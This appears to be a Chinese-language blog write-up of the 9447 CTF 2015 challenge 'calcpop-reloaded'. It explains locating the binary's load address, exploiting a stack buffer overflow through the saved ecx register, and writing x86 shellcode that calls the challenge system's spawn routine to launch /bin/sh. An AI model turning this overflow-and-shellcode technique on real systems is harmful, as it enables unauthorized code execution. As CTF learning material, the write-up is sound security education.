<!doctype html><html lang=zh-cn><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><meta name=generator content="Hugo 0.83.1"><title>Writeup-9447 CTF: calcpop-reloaded - /home/cubarco</title><meta property="og:title" content="Writeup-9447 CTF: calcpop-reloaded - /home/cubarco"><link href=https://cubar.co/favicon.ico rel=icon type=image/x-icon><meta name=description content="Hack, CTF, Writeup, Exploitation"><link rel=stylesheet href=/css/main.min.3bcbe33ae5c46485bcebc6352fc91232f950eb735ccac53f81bd19d79251ba9c.css media=all></head><body><div class=wrapper><header class=header><nav class=nav><a href=/ class=nav-logo><img src=/images/logo-min.png width=50 height=50 alt=Logo></a><ul class=nav-links><li><a href=/>Index</a></li><li><a href=/tags/>Tags</a></li><li><a href=/about/>About</a></li><li><a href=/links/>Links</a></li><li><a href=https://github.com/cubarco/cubarco.github.io>GitHub</a></li></ul></nav></header><main class=content role=main><article class=article><h1 class=article-title>Writeup-9447 CTF: calcpop-reloaded</h1><span class=article-date>2015-12-04</span>
<a class=article-tag href=/tags/hack>Hack</a>
<a class=article-tag href=/tags/ctf>CTF</a>
<a class=article-tag href=/tags/writeup>Writeup</a>
<a class=article-tag href=/tags/exploitation>Exploitation</a><div class=article-content><p><em>从这一题开始，9447 加上了 POW, 其实只要爆破就可以，这里就不放脚本了。（关于 POW, 有个叫 hashcash 的东西，挺有意思的）</em></p><p>这道题我没有在比赛期间做出来。当时完全没有逆向 load address 未知的二进制的经验，什么都干不了。后来简单看了别人的 writeup，在只知道逆向方法的情况下重新做出了这题。前后大概还是花了七八小时（我好渣&mldr;），硬着头皮写篇 writeup 记录一下。</p><h2 id=load-address>Load Address</h2><p>找 load address 的过程大概是先用 radare 打开，然后翻反汇编代码，可以找到<code>mov eax, 0x1007a7</code>这类代码，大概可以猜出 load address 在 0x100000.</p><p>用 IDA 打开，填好 load offset, 开始调试。可以猜出 main 函数(?)的位置大概在 0x1008bc.</p><h2 id=overflow>Overflow</h2><p>接下来找溢出点。可以看到 0x001008EE 处调用了输入函数，分配栈空间是 0x98, 但是传递了一个大概是 size 的参数，值为 0x100. 存在溢出。</p><p>这题和 calcpop 有一点不同的是，calcpop 中输入 exit 会直接退出 main 函数，这题输入 exit 会调用<code>shutdown()</code>之类的函数，没细看，效果就是不会再有输出了。这道题退出 main 函数的方法是，正确输入，让计算结果为 201527, 程序会输出彩蛋信息，然后退出 main 函数。</p><p>接下来就是怎么溢出了，先看 main 函数入口和出口处的栈变化：</p><div class=highlight><pre class=chroma><code class=language-nasm data-lang=nasm><span class=c1>; entry:</span>
<span class=nf>lea</span>     <span class=nb>ecx</span><span class=p>,</span> <span class=p>[</span><span class=nb>esp</span><span class=o>-</span><span class=mi>4</span><span class=p>]</span>
<span class=nf>and</span>     <span class=nb>esp</span><span class=p>,</span> <span class=mh>0FFFFFFF0h</span>
<span class=nf>push</span>    <span class=kt>dword</span> <span class=nv>ptr</span> <span class=p>[</span><span class=nb>ecx</span><span class=o>-</span><span class=mi>4</span><span class=p>]</span>
<span class=nf>push</span>    <span class=nb>ebp</span>
<span class=nf>mov</span>     <span class=nb>ebp</span><span class=p>,</span> <span class=nb>esp</span>
<span class=nf>push</span>    <span class=nb>edi</span>
<span class=nf>push</span>    <span class=nb>esi</span>
<span class=nf>push</span>    <span class=nb>ebx</span>
<span class=nf>push</span>    <span class=nb>ecx</span>

<span class=c1>; exit:</span>
<span class=nf>lea</span>     <span class=nb>esp</span><span class=p>,</span> <span class=p>[</span><span class=nb>ebp</span><span class=o>-</span><span class=mh>10h</span><span class=p>]</span>
<span class=nf>xor</span>     <span class=nb>eax</span><span class=p>,</span> <span class=nb>eax</span>
<span class=nf>pop</span>     <span class=nb>ecx</span>
<span class=nf>pop</span>     <span class=nb>ebx</span>
<span class=nf>pop</span>     <span class=nb>esi</span>
<span class=nf>pop</span>     <span class=nb>edi</span>
<span class=nf>pop</span>     <span class=nb>ebp</span>
<span class=nf>lea</span>     <span class=nb>esp</span><span class=p>,</span> <span class=p>[</span><span class=nb>ecx</span><span class=o>-</span><span class=mi>4</span><span class=p>]</span>
<span class=nf>retn</span>
</code></pre></div><p>溢出到保存 ecx 的位置，使 ecx - 4 指向存有 shellcode 地址的栈位置，然后 ret 就能跳转到 shellcode.</p><h2 id=shellcode>Shellcode</h2><p>这题怎么写 shellcode 也是一个难点，因为系统是 9447 写的，不能直接用 execv 系统调用。所幸的是本题的系统调用功能都是能从一些字符串上看出来的。比如<code>read(%d %x %d)</code>, <code>write(%d %x %d)</code>之类。strings 一下可以看到<code>spawn(%x %x %d)</code>，我就猜测这个是类似 execv 的系统调用。可是参数不明确，特别是第三个参数。试了几次，发现用<code>spawn("/bin/sh", "/bin/sh", 1)</code>这样的参数是可以成功的，第三个参数 1 具体是什么含义，我也没搞明白。</p><p>用 pwntool 生成的 shellcode 如下:</p><div class=highlight><pre class=chroma><code class=language-nasm data-lang=nasm><span class=c1>; push &#39;/bin/sh\x00&#39;</span>
<span class=nf>push</span> <span class=mh>0x1010101</span>
<span class=nf>xor</span> <span class=kt>dword</span> <span class=nv>ptr</span> <span class=p>[</span><span class=nb>esp</span><span class=p>],</span> <span class=mh>0x169722e</span>
<span class=nf>push</span> <span class=mh>0x6e69622f</span>
<span class=nf>mov</span> <span class=nb>edi</span><span class=p>,</span> <span class=nb>esp</span>

<span class=nf>push</span> <span class=mh>0x1</span>
<span class=nf>push</span> <span class=nb>edi</span>
<span class=nf>push</span> <span class=nb>edi</span>
<span class=nf>push</span> <span class=mh>0xdeadbeef</span>  <span class=c1>; junk</span>
<span class=nf>mov</span> <span class=nb>ebx</span><span class=p>,</span> <span class=mi>302125832</span>
<span class=nf>xor</span> <span class=nb>ebx</span><span class=p>,</span> <span class=mh>0x12121212</span>
<span class=nf>call</span> <span class=nb>ebx</span>  <span class=c1>; spawn(%x, %x, %d)</span>
</code></pre></div><h2 id=exppy>exp.py</h2><p>可以用 redos 中的 level1 本地调试。</p><code class=gist data-gist-id=cubarco/b4aee1ac22f1b3039d30><p>Gist: <a href=https://gist.github.com/cubarco/b4aee1ac22f1b3039d30>cubarco/b4aee1ac22f1b3039d30</a></p></code></div></article><script src=https://utteranc.es/client.js repo=cubarco/cubarco.github.io issue-term=pathname label="Comments 💬" theme=boxy-light crossorigin=anonymous async defer></script></main><footer class=footer><ul class=footer-links><li><a href=/index.xml type=application/rss+xml target=_blank>RSS feed</a></li><li><a href=https://gohugo.io/ class=footer-links-kudos target=_blank rel="noopener norefferrer">Made with <img src=/images/hugo-logo.png alt="Img link to Hugo website" width=22 height=22></a></li><li><a>© 2014 - 2015</a></li></ul></footer></div><script async src=https://cdn.jsdelivr.net/gh/cubarco/cubarco.github.io@gh-pages/js/async.min.e8b856a43b93a78048deb0cb92ad99794ad3acb0a2c8093599a653ece0f0a17be8763cdfc99be237c1100cf84542be5aeebc0a7cac0935c48e7b3c95b87c6f34.js onload=window.GistEmbed.init()></script><script async defer src=https://cdn.jsdelivr.net/npm/instant.page@5.1.0/instantpage.min.js></script><script>window.ga_tid="UA-54867602-1",window.ga_api="https://cubar.co/ga-proxy/"</script><script src=https://cdn.jsdelivr.net/npm/cfga@1.0.3 async defer></script><script async defer data-website-id=e9fdcc32-0bfa-4de5-beb0-3bbf1e4638ab src=https://umami.2oo.in/umami.js></script></body></html>